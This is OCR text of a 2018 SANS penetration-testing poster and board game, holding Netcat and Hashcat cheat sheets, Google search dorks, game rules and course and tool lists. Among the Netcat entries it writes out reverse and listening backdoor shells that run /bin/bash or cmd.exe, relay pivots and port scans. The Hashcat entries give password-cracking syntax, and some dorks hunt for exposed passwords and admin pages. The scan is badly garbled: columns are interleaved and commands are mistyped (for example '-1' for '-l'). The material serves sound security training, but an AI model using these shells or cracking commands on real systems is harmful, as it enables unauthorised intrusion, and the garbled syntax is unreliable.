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Read SANS 
Pen Test Blogs 


https://pen-testing.sans.org/blog 


Take SANS 
Pen Test Training 


www.sans.org/pentest 


Attend an InfoSec 
Conference 


https://infosec-conferences.com/ 


Download a PDF version of the Pivots & Payloads poster, 
additional game pieces, and game modifiers at 
www.sans.org/boardgame 
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Fundamentals 


FUNDAMENTAL NETCAT CLIENT: 
$ nc [TargetIPaddr] [port] 


Contributor: 
ED SKOUDIS @edskoudis 
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The Most Trusted Source for Information Security Training, 
Certification, and Research 


HASHCAT [2a] 


Basic Syntax 
hashcat [options]... hash|hashfile|hccapxfile 
[dictionary|mask|directory]... 


FUNDAMENTAL NETCAT LISTENER: 
$ nc -1 -p [LocalPort] 


Attack Modes 


Mode Description Create a Netcat listener on arbitrary local port [LocalPort] 


Straight Dictionary Attack 

Combination Uses 2 wordlists, each word in list 2 is appended to 
Searching for Options each word in list 1 
Unix 3 Brute-force Use Masks, Markov, or pure brute force 
hashcat --help | grep -i [string] Hybrid Wordlist + Mask — Like Combination, but uses a wordlist and brute force 
Windows Hybrid Mask + Wordlist Like Combination, but uses brute force and a wordlist 
hashcat --help | find /i "[string]" 


PEN TEST & VULNERABILITY ASSESSMENT TRAINING 


Hacker Tools, 
Techniques, Exploits, 
and Incident Handling 
GIAC: GCIH 


Both the client and listener take input from STDIN and send 
data received from the network to STDOUT 


Connect to an arbitrary port [port] at IP Address [TargetIPaddr] 


Network Penetration 
Testing and Ethical 
Hacking 

GIAC: GPEN 


Enterprise Threat and 
Vulnerability 


Backdoor Shells Assessment 


LISTENING BACKDOOR SHELL ON LINUX: 
$ nc -1 —p [LocalPort] -e /bin/bash 


Netcat Command Flags 
$ nc [options] [TargetIPaddr] [port(s)] 


The [TargetIPaddr] is simply the other side’s IP address or 
domain name. It is required in client mode, of course (because 
we have to tell the client where to connect), and it is optional 
in listen mode. 


LISTENING BACKDOOR SHELL ON WINDOWS: 
C:\> ne -1 —p [LocalPort] —e cmd.exe 


Common Hash Modes 


ARCHIVES NETWORK PROTOCOLS WEB PLATFORMS Create a shell on local port [LocalPort] that can then be 


Listen mode (default is client mode) accessed using a fundamental Netcat client 


Name # Name it Name # Name 


7-Zip 5500 NetNTLMv1 400 Wordpress, 
NetNTLMv1+ESS Joomla >= 2.5.18 (MD5) 
NetNTLMv2 7900 Drupal7 
Kerberos 5 AS-REQ 124 Django (SHA-1) 
Pre-Auth etype 23 10000 Django 

2500 WPA/WPA2 (PBKDF2-SHA256) 
OPERATING SYSTEMS 2501 WPA/WPA2 PMK 3711 MediaWiki B type 
# Name 5300 IKE-PSK MD5 


1000 NTLM 5400 IKE-PSK SHA1 
3000 LM 


1100 Domain Cached Credentials (DCC), MS Cache DATABASES DOCUMENTS 

2100 Domain Cached Credentials 2 (DCC2), MS Cache 2 # Name # Name 

12800 MS-AzureSync PBKDF2-HMAC-SHA256 11200 MySQL CRAM (SHA1) 9400 MS Office 2007 
5700 Cisco-lOS type 4 (SHA256) 200 MySQL323 9500 MS Office 2010 
9200 Cisco-IOS (PBKDF2-SHA256) 300 MySQL4.1/MySQL5 600 MS Office 2013 
9300 Cisco-l0S (scrypt) 112 Oracle S: Type (Oracle 11+) 10600 PDF 1.7 Level 3 
1500 descrypt, DES (Unix), Traditional DES 12300 Oracle T: Type (Oracle 12+) (Acrobat 9) 
7400 sha256crypt, SHA256 (Unix) 1731 MSSQL (2012, 2014) 10700 PDF 1.7 Level 8 
1800 sha512crypt, SHA512 (Unix) 11100 PostgreSQL CRAM (MD5) (Acrobat 10 - 11) 


MD5 11600 

SHAI 13600 WinZip 5500 

SHA-256 12500 RAR3-hp 5600 

SHA-512 13000 RAR5 7500 
14800 iTunes backup >= 10.0 


Listen harder (supported only on Windows version of Netcat). 
This option makes Netcat a persistent listener that starts 
listening again after a client disconnects 


REVERSE BACKDOOR SHELL ON LINUX: 
$ nc [YourIPaddr] [port] —e /bin/bash 


| SECS60. www.sans.org/sec560 | SECSO4 www.sans.org/sec504 


Advanced Web App Pen 
Testing, Ethical Hacking, 
and Exploitation 
Techniques 


| SECKEO. www.sans.org/sec460 


Automating Information 
Security with Python 
GIAC: GPYC 


UDP mode (default is TCP) REVERSE BACKDOOR SHELL ON WINDOWS: 
C:\> ne [YourIPaddr] [port] —e cmd.exe 
Local port (In listen mode, this is the port listened on; in 


client mode, this is the source port for all packets sent) Create a reverse shell that will attempt to connect to 


[YourIPaddr] on local port [port]. This shell can then be captured 
using a fundamental nc listener 


Web App Penetration 
Testing and Ethical 
Hacking 

GIAC: GWAPT 


Program to execute after connection occurs, connecting STDIN 
and STDOUT to the program 


Don’t perform DNS lookups on names of machines on the 


other side TCP Port Scanner 


PORT SCAN AN IP ADDRESS: 
$ nc —v —n —z —wl [TargetIPaddr] [start_port]-[end_port] 


Zero-|/O mode (Don’t send any data, just emit a packet 
without payload) 


Attempt to connect to each port in a range from [end_port] to 
[start_port] on IP Address [TargetIPaddr] running verbosely (-v 
on Linux, - w on Windows), not resolving names (-n), without 
sending any data (-z), and waiting no more than 1 second for a 
connection to occur (-w1) 


Timeout for connects, waits for N seconds after closure of 
STDIN. A Netcat client or listener with this option will wait for 
N seconds to make a connection. If the connection doesn’t 
happen in that time, Netcat stops running. 


intitle: 


| SECS42 www.sans.org/sec542 


Social Engineering for 
Penetration Testers 


| SEce42 www.sans.org/sec642 


Wireless Penetration 
Testing and 

Ethical Hacking 

GIAC: GAWN 


| SECS73_ www.sans.org/sec573 


Mobile Device Security 
and Ethical Hacking 
GIAC: GMOB 


Be verbose, printing out messages on Standard Error, such as 
when a connection occurs The randomize ports (-r) switch can be used to choose port 


intitle:’Index Of” numbers randomly in the range 


Be very verbose, printing even more details on Standard Error 
Info Commands 
hashcat -I | Show info about OpenCL devices 
hashcat -b | Benchmark all hashes 
hashcat -b -m [#] | Benchmark a specific hash mode 
hashcat -V | Show Verion info 
hashcat [hashfile] --show | Show cracked hashes 
hashcat [hashfile] --left | Show uncracked hashes 


Generate Wordlists for Other Tools with --stdout 

hashcat -a 3 --stdout Password?d | Creates list: Password0-Password9 

hashcat -a 6 --stdout wordlist.dic ?d | Append digits to the end of words 
hashcat -a 7 --stdout ?d wordlist.dic | Prepent digits to the beginning of words 


site: ‘ P 
Netcat Relays on Windows Netcat Relays on Linux 

To start, enter a temporary directory where we will create .bat To start, create a FIFO (named pipe) called backpipe: 
files: $ cd /tmp 

C:\> cd c:\temp $ mknod backpipe p 


intitle:’"admin” 


site:sans.org site:www.sans.org 


Performance Tweaks Performance 


-O | (Capital ‘O’) Optimize Kernel, Passwords < 32 Char. Low 
-w [#] Default 


High 

Nightmare Built-in Character Sets 
Character sets are combined to create “masks” or 
patterns for brute force attacks. 


LISTENER-TO-CLIENT RELAY: LISTENER-TO-CLIENT RELAY: 
C:\> echo nc [TargetIPaddr] [port] > relay.bat $ nc -1 —p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee 
C:\> ne -1 —p [LocalPort] -e relay.bat backpipe 


site:sans.org -site:www.sans.org 


hashcat -w 3 -O -a 0 -m [#] [hashfil dlist 
eure te pac aah tee a Create a relay that sends packets from the local port [LocalPort] 


to a Netcat Client connected to [TargetIPaddr] on port [port] 


Create a relay that sends packets from the local port [LocalPort] 
to a Netcat client connected to [TargetIPaddr] on port [port] 


| SECS67_ www.sans.org/sec567 | SEC6T7 www.sans.org/sec617 


Advanced Exploit 
Development for 
Penetration Testers 


| SECS75 www.sans.org/sec575 


Advanced Penetration 
Testing, Exploit Writing, 
and Ethical Hacking 
GIAC: GXPN 


inurl:admin 


site:target.tgt “at least” “characters long” password 


Examples LISTENER-TO-LISTENER RELAY: LISTENER-TO-LISTENER RELAY: 
Mask Characters ‘ , 
Straight A bcdefehiikl C:\> echo nc -1 —p [LocalPort_2] > relay.bat $ nc -1 —p [LocalPort_1] 0<backpipe | nc —1 —p [LocalPort_2] | tee 
hashcat -a 0 -m [#] [hashfile] [wordlist] ‘ SRCHETE DU KMNS RO ISIUNWNYZ C:\> ne -1 —p [LocalPort_1] —-e relay.bat backpipe 
hashcat -a 0 -m [#] [hashfile] [wordlist] -r [rulefile] ?u ABCDEFGHIJKLMNOPQRSTUVWXYZ 


Combination 2d 0123456789 


hashcat -a 1 -m [#] [hashfile] [wordlist-1] [wordlist-2] 2h 0123456789abcdef 
hashcat -a 1 -m [#] [hashfile] [wordlist-2] [wordlist-1] -r [rulefile] 2H 0123456789ABCDEF 


Brute-force 9 INHEO/ B()k4 — cas? ATL 
hashcat -a 3 -m [#] [hashfile] fg «spacen!"#$%& ()*+,-./3;<=>2@L]*_{I} 


hashcat -a 3 -m [#] [hashfile] [mask] ?a ?leu?d?s 
Hybrid Wordlist + Mask 2b 0x00 - Oxff 
hashcat -a 6 -m [#] [hashfile] [wordlist] [mask] 

Hybrid Mask + Wordlist 

hashcat -a 7 -m [#] [hashfile] [mask] [wordlist] 


Create a relay that will send packets from any connection on 
[LocalPort_1] to any connection on [LocalPort_2] 


site:target.tgt “employee directory” Create a relay that sends packets from any connection on 
i i [LocalPort_1] to any connection on [LocalPort_2] 

filetype: 

CLIENT-TO-CLIENT RELAY: 

C:\> echo nc [NextHopIPaddr] [port2] > relay.bat 

C:\> ne [PreviousHopIPaddr] [port] —e relay.bat 


CLIENT-TO-CLIENT RELAY: 
$ nc [PreviousHopIPaddr] [port] 0<backpipe | nc 
[NextHopIPaddr] [port2] | tee backpipe 


NETWARS 


EXPERIENCE 
v 


filetype:xlsx Create a relay that will send packets from the connection to 
[PreviousHopIPaddr] on port [port] to a Netcat Client connected 


to [NextHopIPaddr] on port [port2] 


Create a relay that sends packets from the connection to 
[PreviousHopIPaddr] on port [port] to a Netcat client connected 
to [NextHopIPaddr] on port [port2] 


“@target.tgt” “Password1” 
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HOW T0 PLAY 


FOR 2 10 6 PLAYERS/AGES 10+ 
GAME ELEMENTS 


(CF-Vantcl oey-Vac| 
Game Pieces* 


OBJECTIVE 


Be the first pen tester to reach “Achievement Unlocked” 


SLINGSHOT [ikiss5r0] 


SANS created the Slingshot Linux Distro for 
penetration testers to use in their work and ina 
variety of SANS pen test courses. All of the tools 
are open-source, updated regularly, and tested 
for quality, cohesiveness, and stability. 
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SIMULATE A FULL-SCALE HIGH-VALUE PENETRATION TEST 


fe) 
Game Modifiers li 
(1) D6 Dice [not included] Download the latest build today at 


Ns ‘ol www.sans.org/slingshot 


Before game play, shuffle the game modifiers and hand one face 
down to each player. Players should not reveal their modifier 
until it is used during the game. 


PIVOTS PAYLOADS 


a 2 and complete the simulated pen test. . Rolla singl dice. The pl ith the high 
SIMULATE A FULL-SCALE HIGH-VALUE PENETRATION TEST ee ibeciten] ak 
. When it' , rolla singl di d 
THE FIRST TIME YOU PLAY 7 Bide Aaya bv sthecs she jhimbe eats ores the 





Use scissors to remove the game pieces and game dice. Note: Two or more game pieces may be on the same space 
modifiers section from the poster. Cut each game piece at the same time. 

and game modifier out to use during the game. You can 4. Follow directions on the square. You may be instructed to lose a 
download a PDF of game pieces and game modifiers at turn or move back spaces. 

www.sans.org/boardgame 


BOARD GAME 
POSTER 


Tools included in Slingshot: 
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RULES OF ENGAGEMENT GAME MODIFIERS Armitage Graphical interface for Netcat Vulnerability scanner 

1. At the beginning of the game, all players are handed one Metasploit 
You and your fellow players are encouraged to create modifier, face down. Nmap Network mapper and vulnerability 
your own rules of engagement for this game. Those rules 2. Players can use their game modifier at any time during the Bro Network analysis framework scanner 


must be agreed upon by all players prior to the 
beginning of the game. 


game. The modifier will then be “used” and will not be allowed 
in game play for the duration of the game. 
3. You may create your own game modifiers to use in this game. 


Browser Exploitation Penetration testing tool that 
Framework (BeEF) focuses on web browser 
exploitation network analysis 
framework 


OWASP Zed Attack Web application vulnerability 
Proxy (ZAP) scanner 


PIVOTS PAYLOADS 


Recon-ng A full-featured web reconnaissance 
SIMULATE A FULL-SCALE HIGH-VALUE PENETRATION TEST 


* Game pieces are used to represent your avatar in the game, but you can create or use any game piece you like. ; 
framework written in Python 


7) —_—_— BurpSuite Web vulnerability scanner 


{ 

PS Achievement |] 
ta 
fe 


a PENETRATION TESTING & VULNERABILITY ASSESSMENT TRAINING ditto UU pb 


includes a pure PowerShell 2.0 
Windows agent, and a pure 


Reporting 


Responder A LLMNR, NBT-NS and MDNS 
poisoner, with built-in 
HTTP/SMB/MSSQL/FTP/LDAP rogue 
authentication server supporting 
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SEC460: Enterprise Threat and 
Vulnerability Assessment 


SEC564: Red Team Operations 
and Threat Emulation 


SEC617: Wireless Penetration Testing 
and Ethical Hacking 


Python 2.6/2.7 Linux/OS X agent 


NTLMv1/NTLMv2/LMv2, Extended 
Security NTLMSSP and Basic HTTP 


Pe www.sans.org/sech60 www.sans.org/sec564 GIAC: GAWN - Assessing and Auditing Sfrecl litenvent aera emer i eae ea 
Wireless Networks write meta information in 

pivoring SEC504: Hacker Tools, Techniques, SEC567: Social Engineering for ayy SAMS Ohe/>—C617 multimedia files Scapy Python packet crafting library 
Exploits, and Incident Handling Penetration Testers 
GIAC: GCIH - Certified Incident Handler www.sans.org/sec567 ae ae Oa Hack Hashcat Very fast password recovery tool Social-Engineer An open-source penetration testing 
www.sans.org/secs04 SANS & hee Se oenta Toolkit (setoolkit) framework designed for social 

IVI : SEC573: Automating Information ARC ENP eration Tecinuges Hydra Tool to brute force crack a engineering 
A SEC542: Web App Penetration Security with Python Bayi Salis OCuseco? remote authentication service 
Testing and Ethical Hacking GIAC: GPYC - Python Coder SQLMap Automatic SQL injection and 
GIAC: GWAPT - Web Application www.sans.org/sec573 SEC660: Advanced Penetration Testing, hn The Ri p, d Ae ie] 1) cat : . J aaa Pp i fe) T $ PAY | Key.\ >) $ Pe i Ke) T $ PAY L OA >) $ 
penciilition tester Eeatoeewine dcdhital wach? John The Ripper Password recovery too atabase takeover too 
; xploit Writing, an ical Hacking SIMULATE A FULL-SGALE HIGH-VALUE PENETRATION TEST SIMULATE A FULL-SCALE HIGH-VALUE PENETRATION TEST 
} i c542 6 A H H b - i ; 5 P 4 a 
ep NN A Bical Wecking- Security i ae tk li alll Lair Collaborative penetration testing Tcpdump Command line packet capture tool 
a volo) Miadgr-Vanr-(el] Uie-Un-\mol-1e-) 
Pech oe: MamNe Brenenacy PIRCIEMOB a Mobile Bevite Setiirity aa aggregation across disparate Veil Evasion Tool to generate payload 
Testing and Ethical Hacking Analyst ggreg 9) g pay 
GIAC: GPEN - Penetration Tester www.sans.org/sec575 SEC760: Advanced Exploit Development SOUNGES executables that bypass common 
www.sans.org/sec560 for Penetration Testers ; ; ; antivirus solutions 
SEC580: Metasploit Kung Fu for www.sans.org/sec760 Metasploit Penetration testing framework ; 

SEC562: CyberCity Hands-on Enterprise Pen Testing for exploitation and Wireshark Graphical packet capture tool 
Kinetic Cyber Range Exercise www.sans.org/sec580 post-exploitation 
PRIVATE TRAINING ONLY 
wwwsans.org/sec562 VVAVVAVVARs¥oN aISIx@) re/ roadmap Nessus TCP/IP Swiss army knife 


Download PDF version: 
2-6 www.sans.org/boardgame 
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AGES | PLAYERS 
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ae Past challenges are available 24/7/365: 


ONAN Siasiaiauies) 


PEN-PR-BGP_v1_1018 Develop hands-on skills in our fun and festive annual holiday-themed hacking 


Created by SANS Penetration Testing Curriculum Staff and Faculty challenge from the makers of SANS NetWars and training courses and labs. 


©2018 SANS Institute. All Rights Reserved. 


www.holidayhackchallenge.com 
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